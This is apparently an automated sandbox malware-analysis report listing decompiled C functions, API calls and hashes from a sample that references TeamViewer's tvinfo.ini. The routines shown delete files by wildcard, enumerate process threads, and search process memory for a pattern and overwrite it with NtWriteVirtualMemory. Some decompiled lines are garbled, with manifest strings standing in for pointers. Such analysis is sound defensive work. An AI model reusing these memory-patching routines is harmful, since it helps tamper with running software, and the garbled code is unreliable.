                                                                                                                        • Instruction ID: ff7ae4a22af98f1ede601656746b62f7d23d60e92932ca53c8e4e25f4943a0b2
                                                                                                                        • Opcode Fuzzy Hash: af15d0e1a138e9fb1e2b282ef002459527b2498bbac3ecb482b5d3beb8cb70f6
                                                                                                                        • Instruction Fuzzy Hash: 77C18074C00148EEDF11EBA4CD51BEEBB79AF25308F1480AEE105A31A2DB785F49CB65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F332DF0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 88%
                                                                                                                        			E6F332DF0(intOrPtr _a4, intOrPtr _a8) {
				char _v512;
				char _v520;
				char _v832;
				struct _WIN32_FIND_DATAA _v840;
				void* _t18;
				signed char _t19;
				CHAR* _t26;
				intOrPtr _t29;
				void* _t36;
				void* _t37;
				FILETIME* _t40;

				_t29 = _a4;
				_t37 = 0;
				wsprintfA( &_v520, "%s%c%s", _t29, 0x2a, _a8);
				_t40 =  &( &_v840->ftLastWriteTime);
				_push(0x140);
				_push( &_v832);
				L6F33C2EE();
				_t18 = FindFirstFileA( &_v520,  &_v840); // executed
				_t36 = _t18;
				if(_t36 != 0xffffffff) {
					do {
						_t19 = _v840.dwFileAttributes;
						if((_t19 & 0x00000010) == 0 && _t19 != 0) {
							wsprintfA( &_v520, "%s%s", _t29,  &(_v840.cFileName));
							_t40 = _t40 + 0x10;
							_t26 = DeleteFileA( &_v512);
							if(_t26 == 0) {
								MoveFileExA( &_v512, _t26, 4);
							}
							_t37 = 1;
						}
					} while (FindNextFileA(_t36,  &_v840) != 0);
					FindClose(_t36);
					return _t37;
				} else {
					return 0;
				}
			}














                                                                                                                        0x6f332dfb
                                                                                                                        0x6f332e1c
                                                                                                                        0x6f332e1e
                                                                                                                        0x6f332e20
                                                                                                                        0x6f332e23
                                                                                                                        0x6f332e2c
                                                                                                                        0x6f332e2d
                                                                                                                        0x6f332e3f
                                                                                                                        0x6f332e45
                                                                                                                        0x6f332e4a
                                                                                                                        0x6f332e60
                                                                                                                        0x6f332e60
                                                                                                                        0x6f332e66
                                                                                                                        0x6f332e7f
                                                                                                                        0x6f332e81
                                                                                                                        0x6f332e8c
                                                                                                                        0x6f332e94
                                                                                                                        0x6f332ea1
                                                                                                                        0x6f332ea1
                                                                                                                        0x6f332ea7
                                                                                                                        0x6f332ea7
                                                                                                                        0x6f332eb8
                                                                                                                        0x6f332ebd
                                                                                                                        0x6f332ecf
                                                                                                                        0x6f332e4f
                                                                                                                        0x6f332e58
                                                                                                                        0x6f332e58

                                                                                                                        APIs
                                                                                                                        • wsprintfA.USER32 ref: 6F332E1E
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000140), ref: 6F332E2D
                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,00000140), ref: 6F332E3F
                                                                                                                        • wsprintfA.USER32 ref: 6F332E7F
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 6F332E8C
                                                                                                                        • MoveFileExA.KERNEL32 ref: 6F332EA1
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 6F332EB2
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 6F332EBD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find$wsprintf$CloseDeleteFirstMemoryMoveNextZero
                                                                                                                        • String ID: %s%c%s$%s%s
                                                                                                                        • API String ID: 3499340181-3555087778
                                                                                                                        • Opcode ID: 1e441bb8b4b3cb56a1f0265f5d2aff9d2d82852ddff8eecaa43896e3dead2926
                                                                                                                        • Instruction ID: f4bc618684fe5d52835a5a6c54ff989a0e3287ad4fc953531d052855620c27db
                                                                                                                        • Opcode Fuzzy Hash: 1e441bb8b4b3cb56a1f0265f5d2aff9d2d82852ddff8eecaa43896e3dead2926
                                                                                                                        • Instruction Fuzzy Hash: 7321D573A04395ABD320DBA4DC85EEB73ADEBC8721F40091DFA54D6140EB35E11487A1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004E177C, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 115COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004E179B
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,0000000C), ref: 004E17CE
                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?), ref: 004E17DB
                                                                                                                        • _wcscat_s.LIBCMT ref: 004E17FA
                                                                                                                        • _memset.LIBCMT ref: 004E1818
                                                                                                                        • GetPrivateProfileStringW.KERNEL32(Installation,INSTEXE,0077C1F8,?,00000100,?), ref: 004E183F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: File$H_prolog3ModuleNamePathPrivateProfileRemoveSpecString_memset_wcscat_s
                                                                                                                        • String ID: INSTEXE$Installation$\tvinfo.ini
                                                                                                                        • API String ID: 3006198713-428253807
                                                                                                                        • Opcode ID: f3ca824da903d3d66d1a53bc91b08e0afd2a4f62bd92fcec2d77fe7164b4bddd
                                                                                                                        • Instruction ID: 509cd7efbefe80bf997b95202da801206c46533324e6e5bee6f0a68a4001ef9e
                                                                                                                        • Opcode Fuzzy Hash: f3ca824da903d3d66d1a53bc91b08e0afd2a4f62bd92fcec2d77fe7164b4bddd
                                                                                                                        • Instruction Fuzzy Hash: 1841B4B1A80249ABDB20EF65DC81AEE77A8FF45304F50402AFD05E7291DB789E09CB54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33B0A0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106memorynativethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33B0A0(long* __esi) {
				long _t27;
				int _t28;
				long _t29;
				void _t31;
				long _t34;
				void* _t36;
				void* _t37;
				void* _t40;
				long _t44;
				void* _t52;
				void* _t53;
				void* _t55;
				intOrPtr _t57;
				long* _t58;
				void* _t60;
				long* _t62;

				_t58 = __esi;
				_t62[4] = 0;
				_t27 = NtQuerySystemInformation(5, 0, 0, _t62); // executed
				if(_t27 == 0xc0000004) {
					_t27 =  *_t62;
					if(_t27 != 0) {
						_t28 = VirtualAlloc(0, _t27, 0x1000, 4); // executed
						_t55 = _t28;
						_t62[3] = _t55;
						if(_t55 == 0) {
							L23:
							return _t28;
						}
						_t29 = NtQuerySystemInformation(5, _t55, _t62[1],  &(_t62[1])); // executed
						if(_t29 < 0 || _t62[1] <= 0) {
							L22:
							_t28 = VirtualFree(_t55, _t62[1], 0x8000);
							goto L23;
						} else {
							_t60 = _t55;
							do {
								if( *((intOrPtr*)(_t60 + 0x44)) != GetCurrentProcessId()) {
									L19:
									_t31 =  *_t60;
									if(_t31 == 0) {
										break;
									}
									goto L20;
								}
								_t40 = 0;
								if( *((intOrPtr*)(_t60 + 4)) <= 0) {
									goto L19;
								}
								_t8 = _t60 + 0xdc; // 0xdc
								_t62[4] = _t8;
								do {
									_t57 =  *(_t62[4]);
									if(_t57 == GetCurrentThreadId()) {
										goto L17;
									}
									_t34 =  *_t58;
									if(_t34 != 0) {
										_t44 = _t58[1];
										if(_t58[2] < _t44) {
											L16:
											 *((intOrPtr*)( *_t58 + _t58[2] * 4)) = _t57;
											_t58[2] = _t58[2] + 1;
											goto L17;
										}
										_t52 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x2700000
										_t36 = HeapReAlloc(_t52, 0, _t34, _t44 + _t44 + _t44 + _t44 + _t44 + _t44 + _t44 + _t44);
										if(_t36 == 0) {
											break;
										}
										_t58[1] = _t58[1] + _t58[1];
										 *_t58 = _t36;
										goto L16;
									}
									_t58[1] = 0x80;
									_t53 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x2700000
									_t37 = HeapAlloc(_t53, _t34, 0x200);
									 *_t58 = _t37;
									if(_t37 == 0) {
										break;
									}
									goto L16;
									L17:
									_t62[4] = _t62[4] + 0x40;
									_t40 = _t40 + 1;
								} while (_t40 <  *((intOrPtr*)(_t60 + 4)));
								_t55 = _t62[5];
								goto L19;
								L20:
								_t60 = _t60 + _t31;
							} while (_t60 != 0);
							goto L22;
						}
					}
				}
				return _t27;
			}



















                                                                                                                        0x6f33b0a0
                                                                                                                        0x6f33b0ad
                                                                                                                        0x6f33b0b5
                                                                                                                        0x6f33b0bf
                                                                                                                        0x6f33b0c5
                                                                                                                        0x6f33b0ca
                                                                                                                        0x6f33b0db
                                                                                                                        0x6f33b0e1
                                                                                                                        0x6f33b0e3
                                                                                                                        0x6f33b0e9
                                                                                                                        0x6f33b1e1
                                                                                                                        0x00000000
                                                                                                                        0x6f33b1e1
                                                                                                                        0x6f33b0fc
                                                                                                                        0x6f33b103
                                                                                                                        0x6f33b1d0
                                                                                                                        0x6f33b1db
                                                                                                                        0x00000000
                                                                                                                        0x6f33b114
                                                                                                                        0x6f33b115
                                                                                                                        0x6f33b118
                                                                                                                        0x6f33b121
                                                                                                                        0x6f33b1bf
                                                                                                                        0x6f33b1bf
                                                                                                                        0x6f33b1c4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33b1c4
                                                                                                                        0x6f33b127
                                                                                                                        0x6f33b12c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33b132
                                                                                                                        0x6f33b138
                                                                                                                        0x6f33b140
                                                                                                                        0x6f33b144
                                                                                                                        0x6f33b14e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33b150
                                                                                                                        0x6f33b154
                                                                                                                        0x6f33b178
                                                                                                                        0x6f33b17e
                                                                                                                        0x6f33b1a5
                                                                                                                        0x6f33b1aa
                                                                                                                        0x6f33b1ad
                                                                                                                        0x00000000
                                                                                                                        0x6f33b1ad
                                                                                                                        0x6f33b180
                                                                                                                        0x6f33b191
                                                                                                                        0x6f33b199
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33b1a0
                                                                                                                        0x6f33b1a3
                                                                                                                        0x00000000
                                                                                                                        0x6f33b1a3
                                                                                                                        0x6f33b15b
                                                                                                                        0x6f33b162
                                                                                                                        0x6f33b16a
                                                                                                                        0x6f33b170
                                                                                                                        0x6f33b174
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33b1b0
                                                                                                                        0x6f33b1b0
                                                                                                                        0x6f33b1b5
                                                                                                                        0x6f33b1b6
                                                                                                                        0x6f33b1bb
                                                                                                                        0x00000000
                                                                                                                        0x6f33b1c6
                                                                                                                        0x6f33b1c6
                                                                                                                        0x6f33b1c6
                                                                                                                        0x00000000
                                                                                                                        0x6f33b1cf
                                                                                                                        0x6f33b103
                                                                                                                        0x6f33b0ca
                                                                                                                        0x6f33b1e5

                                                                                                                        APIs
                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 6F33B0B5
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000), ref: 6F33B0DB
                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 6F33B0FC
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000005,00000000,000000FF,000000FF), ref: 6F33B118
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6F33B146
                                                                                                                        • HeapAlloc.KERNEL32(02700000,00000000,00000200), ref: 6F33B16A
                                                                                                                        • HeapReAlloc.KERNEL32(02700000,00000000,00000000,?), ref: 6F33B191
                                                                                                                        • VirtualFree.KERNEL32(00000000,000000FF,00008000,00000005,00000000,000000FF,000000FF), ref: 6F33B1DB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Alloc$CurrentHeapInformationQuerySystemVirtual$FreeProcessThread
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 494489134-2766056989
                                                                                                                        • Opcode ID: 0b83c9daec83d47dc7ebbb295703b958809b84ae84161442182e0d004aec0d1a
                                                                                                                        • Instruction ID: 48e3aa18de10c5daafcc2cca0ee42305264480da770c17a9b769614c424a8162
                                                                                                                        • Opcode Fuzzy Hash: 0b83c9daec83d47dc7ebbb295703b958809b84ae84161442182e0d004aec0d1a
                                                                                                                        • Instruction Fuzzy Hash: F7314D72A04B959FE720CF24C955B6B77E9EB84B18F10841DF9968B280D771F804CB51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F337790, Relevance: 12.1, APIs: 8, Instructions: 86threadwindownativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F337790(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* _t7;
				void* _t8;
				_Unknown_base(*)()* _t10;
				long _t11;
				void* _t12;
				long _t14;
				void* _t17;
				int _t20;
				void* _t22;
				void* _t24;
				struct HWND__* _t25;
				int _t26;
				void* _t27;

				_t20 = _a12;
				_t26 = _a8;
				_t25 = _a4;
				_t27 = _t26 - 0x16;
				if(_t27 > 0) {
					if(_t26 == 0x18) {
						goto L15;
					} else {
						if(_t26 == 0x112) {
							_t7 = _t20 - 0xf020;
							if(_t7 == 0) {
								goto L15;
							} else {
								_t8 = _t7 - 0x10;
								if(_t8 == 0 || _t8 == 0xf0) {
									goto L15;
								} else {
									goto L19;
								}
							}
						} else {
							if(_t26 != 0x83fc) {
								goto L19;
							} else {
								"one=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t20; // executed
								_t12 = CreateThread(0, 0, E6F336D50, 0, 0,  &M6F3404C4); // executed
								M6F3404C0 = _t12;
								goto L15;
							}
						}
					}
				} else {
					if(_t27 == 0) {
						PostMessageA(_t25, 0x10, 0, 0);
						goto L19;
					} else {
						if(_t26 == 3 || _t26 == 7) {
							L15:
							return 0;
						} else {
							if(_t26 == 0x10) {
								M6F3404B0 = 1;
								if(M6F3404C0 != 0) {
									_t14 = M6F3404C4; // 0x15cc
									PostThreadMessageA(_t14, _t26, 0, 0);
									_t22 = M6F3404C0; // 0x7f0
									if(WaitForSingleObject(_t22, 0x1388) != 0) {
										_t24 = M6F3404C0; // 0x7f0
										NtTerminateThread(_t24, 0);
									}
									_t17 = M6F3404C0; // 0x7f0
									CloseHandle(_t17);
								}
								PostQuitMessage(0);
							}
							L19:
							_t10 = "one=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x770b94c0
							_t11 = CallWindowProcW(_t10, _t25, _t26, _t20, _a16); // executed
							return _t11;
						}
					}
				}
			}
















                                                                                                                        0x6f337791
                                                                                                                        0x6f337796
                                                                                                                        0x6f33779b
                                                                                                                        0x6f33779f
                                                                                                                        0x6f3377a2
                                                                                                                        0x6f337835
                                                                                                                        0x00000000
                                                                                                                        0x6f337837
                                                                                                                        0x6f33783d
                                                                                                                        0x6f337876
                                                                                                                        0x6f33787b
                                                                                                                        0x00000000
                                                                                                                        0x6f33787d
                                                                                                                        0x6f33787d
                                                                                                                        0x6f337880
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f337880
                                                                                                                        0x6f33783f
                                                                                                                        0x6f337845
                                                                                                                        0x00000000
                                                                                                                        0x6f337847
                                                                                                                        0x6f33785b
                                                                                                                        0x6f337861
                                                                                                                        0x6f337867
                                                                                                                        0x00000000
                                                                                                                        0x6f337867
                                                                                                                        0x6f337845
                                                                                                                        0x6f33783d
                                                                                                                        0x6f3377a8
                                                                                                                        0x6f3377a8
                                                                                                                        0x6f33782a
                                                                                                                        0x00000000
                                                                                                                        0x6f3377aa
                                                                                                                        0x6f3377ad
                                                                                                                        0x6f33786e
                                                                                                                        0x6f337871
                                                                                                                        0x6f3377bc
                                                                                                                        0x6f3377bf
                                                                                                                        0x6f3377cc
                                                                                                                        0x6f3377d6
                                                                                                                        0x6f3377d8
                                                                                                                        0x6f3377e3
                                                                                                                        0x6f3377e9
                                                                                                                        0x6f3377fd
                                                                                                                        0x6f3377ff
                                                                                                                        0x6f337808
                                                                                                                        0x6f337808
                                                                                                                        0x6f33780d
                                                                                                                        0x6f337813
                                                                                                                        0x6f337813
                                                                                                                        0x6f33781b
                                                                                                                        0x6f33781b
                                                                                                                        0x6f337889
                                                                                                                        0x6f33788d
                                                                                                                        0x6f337897
                                                                                                                        0x6f3378a0
                                                                                                                        0x6f3378a0
                                                                                                                        0x6f3377ad
                                                                                                                        0x6f3377a8

                                                                                                                        APIs
                                                                                                                        • PostThreadMessageA.USER32 ref: 6F3377E3
                                                                                                                        • WaitForSingleObject.KERNEL32(000007F0,00001388), ref: 6F3377F5
                                                                                                                        • NtTerminateThread.NTDLL ref: 6F337808
                                                                                                                        • CloseHandle.KERNEL32(000007F0), ref: 6F337813
                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 6F33781B
                                                                                                                        • PostMessageA.USER32 ref: 6F33782A
                                                                                                                        • CreateThread.KERNEL32 ref: 6F337861
                                                                                                                        • CallWindowProcW.USER32(770B94C0,?,?,?,?), ref: 6F337897
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread$CallCloseCreateHandleObjectProcQuitSingleTerminateWaitWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1229868629-0
                                                                                                                        • Opcode ID: 824dcab9c096e68e035363804d759b246c01f09b7ba470af863497fe13b3871a
                                                                                                                        • Instruction ID: ca06e3b13392cbce3a3c6e23bb8c6b3b4d7e50a930f95373addd9bf49e26902b
                                                                                                                        • Opcode Fuzzy Hash: 824dcab9c096e68e035363804d759b246c01f09b7ba470af863497fe13b3871a
                                                                                                                        • Instruction Fuzzy Hash: 1021D873F483A5BBEB20EA588C4AF967A6CE796721F00052EF2519B2C0C775A814CB50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F338400, Relevance: 9.1, APIs: 6, Instructions: 90nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 62%
                                                                                                                        			E6F338400() {
				intOrPtr _v4;
				intOrPtr _v12;
				intOrPtr _v28;
				long _v40;
				void _v44;
				void* _v48;
				intOrPtr _v56;
				long _v80;
				char _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				long _v108;
				intOrPtr _v116;
				intOrPtr _v128;
				long _v132;
				long _t26;
				long _t28;
				long _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t42;
				long _t44;
				union _MEMORY_INFORMATION_CLASS _t47;
				void* _t49;
				intOrPtr _t52;

				_t31 = 0;
				_v80 = 0;
				_t26 = NtQuerySystemInformation(0,  &_v44, 0x2c,  &_v80); // executed
				if(_v28 <= 0) {
					return _t26;
				} else {
					_t52 = _v12;
					_t42 = _v4;
					do {
						_push(0x1c);
						_push( &_v88);
						L6F33C2EE();
						_t47 = 0;
						_v108 = 0;
						_t28 = NtQueryVirtualMemory(0xffffffff, _t31, 0,  &_v96, 0x1c,  &_v108);
						if(_t28 >= 0 && _v128 == 0x1c) {
							_t32 = _v116;
							if(_v100 == 0x1000 && _v96 == 4 && _v92 == 0x20000 && _v104 != _t42) {
								while(1) {
									_t28 = _t47 + _t32;
									__imp__RtlCompareMemory(_t52, _t28, _t42);
									if(_t28 == _t42) {
										break;
									}
									_t47 = _t47 + 1;
									if(_t47 < _v116 - _t42) {
										continue;
									}
									goto L11;
								}
								_t44 = _v40;
								_t49 = _t47 + _t32;
								_v132 = 0;
								_t30 = NtWriteVirtualMemory(0xffffffff, _t49, _v48, _t44,  &_v132); // executed
								_push(_t44);
								_push(_t49);
								_push(0xffffffff);
								L6F33C336();
								return _t30;
							}
							L11:
							_t31 = _t32 + _v104;
						}
					} while (_t31 < _v56);
					return _t28;
				}
			}






























                                                                                                                        0x6f33840f
                                                                                                                        0x6f338413
                                                                                                                        0x6f338417
                                                                                                                        0x6f338420
                                                                                                                        0x6f3384f2
                                                                                                                        0x6f338426
                                                                                                                        0x6f338427
                                                                                                                        0x6f33842c
                                                                                                                        0x6f338431
                                                                                                                        0x6f338431
                                                                                                                        0x6f338437
                                                                                                                        0x6f338438
                                                                                                                        0x6f338449
                                                                                                                        0x6f33844f
                                                                                                                        0x6f338453
                                                                                                                        0x6f33845a
                                                                                                                        0x6f33846b
                                                                                                                        0x6f33846f
                                                                                                                        0x6f338490
                                                                                                                        0x6f338491
                                                                                                                        0x6f338496
                                                                                                                        0x6f33849e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3384a4
                                                                                                                        0x6f3384a9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3384a9
                                                                                                                        0x6f3384c1
                                                                                                                        0x6f3384d0
                                                                                                                        0x6f3384d5
                                                                                                                        0x6f3384dd
                                                                                                                        0x6f3384e2
                                                                                                                        0x6f3384e3
                                                                                                                        0x6f3384e4
                                                                                                                        0x6f3384e6
                                                                                                                        0x00000000
                                                                                                                        0x6f3384ed
                                                                                                                        0x6f3384ab
                                                                                                                        0x6f3384ab
                                                                                                                        0x6f3384ab
                                                                                                                        0x6f3384af
                                                                                                                        0x6f3384c0
                                                                                                                        0x6f3384c0

                                                                                                                        APIs
                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 6F338417
                                                                                                                        • RtlZeroMemory.NTDLL(?,0000001C), ref: 6F338438
                                                                                                                        • NtQueryVirtualMemory.NTDLL(000000FF,00000000,00000000,0000001C,0000001C,?), ref: 6F338453
                                                                                                                        • RtlCompareMemory.NTDLL(?,00000000,?), ref: 6F338496
                                                                                                                        • NtWriteVirtualMemory.NTDLL ref: 6F3384DD
                                                                                                                        • NtFlushInstructionCache.NTDLL ref: 6F3384E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Memory$QueryVirtual$CacheCompareFlushInformationInstructionSystemWriteZero
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 145697856-0
                                                                                                                        • Opcode ID: 5d321b888b41c347f2749d2d1c218793ea62b190ebd0ae8cb31b33e59316caf1
                                                                                                                        • Instruction ID: 0080b3b2eed9b717a3d3651d1a67a4fb6ea759cc3e924ad000adc7748528338a
